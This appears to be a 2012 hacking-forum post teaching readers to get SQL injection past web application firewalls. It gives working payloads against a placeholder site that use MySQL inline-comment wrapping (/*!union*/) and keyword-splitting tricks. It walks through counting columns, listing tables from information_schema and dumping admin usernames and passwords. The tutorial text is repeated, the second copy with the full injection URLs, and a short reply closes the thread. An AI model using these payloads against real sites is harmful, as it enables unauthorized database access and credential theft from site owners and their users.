WAF BYPASS Tutorial 10-28-2012, 04:37 PM
#1
Hi guys,
so i will show you how to do WAF ( im still beginner ). Hope someone will find this useful.
So WAF ( Web application firewall ) is a filter inside website that doesn't allow commands like union select, group_concat, etc.
In this tutorial i will show you how to bypass that filter ( firewall ) and get useful infos from website. Its not that easy but with lot of practice it will get easier for you.
So lets begin.
What will you need for this tutorial is:
Vulnerable site
Basic knowledge of SQLi
Text to hex converter
Now for example our site will be this one:
So lets find vulnerability. When you find it i will look something like this:
When you add ( ' ) on the end you will get error. So now lets use command order by or group by or any other method ( command ) for finding how much columns there is.
So lets continue.
No error but if your command gets filtered and you get forbidden page just add this
Now lets raise number 1 to 2. Its same command and we get same thing no error.
3----> no error
4----> no error
5----> no error
6----> error.
Our site have 5 columns. Now we need to find vulnerable column number. Lots of sites are getting filtered here on this command. But lets try
Yeah our command got filtered. Best way to see what part of command is filtered is to use source of site.
Now lets bypass this filter
If you still getting forbidden page you can use lots of codes for bypass that.
You can even combine codes.
Here are some of them:
So our code bypass our filter and we got vulnerable column number. Its number 2
So now lets find tables from vulnerable number.
Again we got filtered. This time its group_concat and information_schema. So its same procedure. Use /*! */ and you should get it work.
Lets try
Yes we got our table. Now find table something like admin,users,login,etc.
You can use LIMIT 1,1 before -- and just raise 1,1 to 2,1, etc to get table.
Ok so now when we have found our table ( admin ) lets get columns from it.
The code is same but we will change something. Use text to hex converter to hex your table.
You need to use 0x before hex in order to work.
So now we should get our columns from table admin.
They are username and password. Now lets get them..
Now you should get admin username and password. Hope this will help. If there are mistakes please tell me. Sorry for my bad english. This is just a basic, there is more to show about WAF.
-Crow
so i will show you how to do WAF ( im still beginner ). Hope someone will find this useful.
So WAF ( Web application firewall ) is a filter inside website that doesn't allow commands like union select, group_concat, etc.
In this tutorial i will show you how to bypass that filter ( firewall ) and get useful infos from website. Its not that easy but with lot of practice it will get easier for you.
So lets begin.
What will you need for this tutorial is:
Vulnerable site
Basic knowledge of SQLi
Text to hex converter
Now for example our site will be this one:
Code:
http://www.vulnerable-site.comSo lets find vulnerability. When you find it i will look something like this:
Code:
http://www.vulnerable-site.com/index.php?id=88'When you add ( ' ) on the end you will get error. So now lets use command order by or group by or any other method ( command ) for finding how much columns there is.
So lets continue.
Code:
http://www.vulnerable-site.com/index.php?id=88 order by 1--No error but if your command gets filtered and you get forbidden page just add this
Code:
/*!order*/ /*!by*/ 1--Now lets raise number 1 to 2. Its same command and we get same thing no error.
3----> no error
4----> no error
5----> no error
6----> error.
Our site have 5 columns. Now we need to find vulnerable column number. Lots of sites are getting filtered here on this command. But lets try
Code:
http://www.vulnerable-site.com/index.php?id=88 union select 1,2,3,4,5--Yeah our command got filtered. Best way to see what part of command is filtered is to use source of site.
Now lets bypass this filter
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,2,3,4,5--If you still getting forbidden page you can use lots of codes for bypass that.
You can even combine codes.
Here are some of them:
Code:
/*!union*/ select
UNIunionON SELselectECT
uni>on sel>ect
etc
etcSo our code bypass our filter and we got vulnerable column number. Its number 2
So now lets find tables from vulnerable number.
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--Again we got filtered. This time its group_concat and information_schema. So its same procedure. Use /*! */ and you should get it work.
Lets try
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,/*!group_concat*/(table_name),3,4,5 from /*!information_schema*/.tables where table_schema=database()--Yes we got our table. Now find table something like admin,users,login,etc.
You can use LIMIT 1,1 before -- and just raise 1,1 to 2,1, etc to get table.
Ok so now when we have found our table ( admin ) lets get columns from it.
The code is same but we will change something. Use text to hex converter to hex your table.
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,/*!group_concat*/(column_name),3,4,5 from /*!information_schema*/.columns where table_name=0xHEX OF TABLE--You need to use 0x before hex in order to work.
So now we should get our columns from table admin.
They are username and password. Now lets get them..
Code:
http://www.vulnerable-site.com/index.php?id=88 /*!union*/ /*!select*/ 1,/*!group_concat*/(username,0x3a,password,0x0a),3,4,5 from admin--Now you should get admin username and password. Hope this will help. If there are mistakes please tell me. Sorry for my bad english. This is just a basic, there is more to show about WAF.
-Crow
![[Image: lupado1c3f2.png]](http://www.auplod.com/u/lupado1c3f2.png)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: bAMEI93.jpg]](http://i.imgur.com/bAMEI93.jpg)
im glad you like it
![[Image: fSEZXPs.png]](https://i.imgur.com/fSEZXPs.png)